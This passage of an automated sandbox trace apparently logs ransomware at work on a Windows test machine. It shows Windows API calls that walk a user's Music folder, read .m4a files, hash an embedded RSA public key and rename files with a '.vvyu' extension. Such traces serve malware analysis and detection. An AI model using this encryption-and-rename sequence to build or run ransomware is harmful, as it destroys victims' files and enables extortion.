lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd28 [0189.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd28 | out: hHeap=0x6a0000) returned 1 [0189.984] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.984] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.984] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.984] CloseHandle (hObject=0x584) returned 1 [0189.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0189.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0189.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0189.986] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\uI-Z5b.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ui-z5b.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\uI-Z5b.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ui-z5b.m4a.vvyu")) returned 1 [0189.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.988] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x723d10 | out: hHeap=0x6a0000) returned 1 [0189.991] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x569341e0, ftCreationTime.dwHighDateTime=0x1d8a62d, ftLastAccessTime.dwLowDateTime=0xc8d57cb0, ftLastAccessTime.dwHighDateTime=0x1d8a66d, ftLastWriteTime.dwLowDateTime=0xc8d57cb0, ftLastWriteTime.dwHighDateTime=0x1d8a66d, nFileSizeHigh=0x0, nFileSizeLow=0x6a6f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wd-bCBiK6pAQlyST.m4a", cAlternateFileName="WD-BCB~1.M4A")) returned 1 [0189.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0189.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0189.991] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\wd-bCBiK6pAQlyST.m4a") returned=".m4a" [0189.991] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\wd-bCBiK6pAQlyST.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\wd-bcbik6paqlyst.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.993] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=27247) returned 1 [0189.993] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.995] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6a49, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.995] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.998] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.998] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x6a6f, lpOverlapped=0x0) returned 1 [0189.999] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.999] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.999] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.999] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0190.000] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.000] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.000] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.000] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.000] GetLastError () returned 0x0 [0190.000] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.000] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0190.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.001] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.001] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.001] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6a70) returned 0x2d45778 [0190.001] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d394e0 [0190.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a60 [0190.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39528 [0190.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a78 [0190.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39aa8 [0190.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b08 [0190.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ac0 [0190.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.002] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0190.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0190.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0190.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b08 [0190.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0190.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ac0 [0190.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39aa8 [0190.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0190.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0190.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0190.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0190.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0190.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0190.005] GetCurrentThreadId () returned 0x264 [0190.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44240 [0190.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0190.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.006] GetCurrentThreadId () returned 0x264 [0190.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0190.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0190.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c829b0 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b08 [0190.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39aa8 [0190.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0190.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ac0 [0190.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a90 [0190.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b20 [0190.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0190.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39af0 [0190.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ad8 [0190.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b38 [0190.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ad8 [0190.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0190.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39aa8 [0190.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0190.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0190.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0190.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0190.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0190.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0190.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0190.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: 